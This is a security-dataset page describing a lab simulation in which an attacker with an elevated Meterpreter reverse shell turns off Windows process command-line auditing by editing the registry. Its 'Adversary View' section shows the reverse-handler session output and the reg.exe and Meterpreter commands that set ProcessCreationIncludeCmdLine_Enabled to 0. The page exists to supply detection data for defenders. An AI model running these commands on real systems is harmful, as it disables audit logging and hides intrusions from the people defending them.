Disabling Process Command Line Logging via Registry Modification

Metadata

Contributors	Jose Rodriguez @Cyb3rPandaH
Creation Date	2022/07/03
Modification Date	2022/08/18
Tactics	TA0005
Techniques	T1562.002
Tags	reg,cmd,microsoft windows security auditing

Dataset Description

After getting a shell with elevated privileges on the target, we used reg.exe to modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit registry key. Logging of command line in process creation events for Microsoft Windows Security Auditing was disabled by changing the registry value data from 1 to 0 in the ProcessCreationIncludeCmdLine_Enabled registry value. This dataset was generated using a Windows 10 Pro edition (Version:1903,OS Build:18362.30) and Kali Linux (Version:2022.2).

Datasets Downloads

Type	Link
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_cmd_process_commandline_logging_disabled.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_meterpreter_process_commandline_logging_disabled.zip

Simulation Metadata

Tools

type	Name	Module
Manual	reg.exe	reg.exe
Manual	Metasploit	reg

Adversary View

***** Using reg.exe
msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: kmnbsoc3) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 10 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 20:34:35 -0400 
meterpreter > shell 
Process 5028 created. 
Channel 1 created. 
Microsoft Windows [Version 10.0.18362.30] 
(c) 2019 Microsoft Corporation. All rights reserved. 
C:\Users\pedro\Downloads>reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f 
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit /t REG_DWORD /v ProcessCreationIncludeCmdLine_Enabled /d 0 /f 
The operation completed successfully. 
C:\Users\pedro\Downloads> 

***** Using reg (Meterpreter)
msf6 exploit(multi/handler) > run 
[*] Started HTTPS reverse handler on https://192.168.56.40:8443 
[*] https://192.168.56.40:8443 handling request from 192.168.56.44; (UUID: wqp60sgl) Staging x64 payload (201308 bytes) ... 
[*] Meterpreter session 4 opened (192.168.56.40:8443 -> 127.0.0.1 ) at 2022-08-18 18:46:35 -0400 
meterpreter > reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit' -v 'ProcessCreationIncludeCmdLine_Enabled' -t 'REG_DWORD' -d 0 
Successfully set ProcessCreationIncludeCmdLine_Enabled of REG_DWORD. 
meterpreter > 

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/reg_cmd_process_commandline_logging_disabled.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)

References

• https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation

• https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg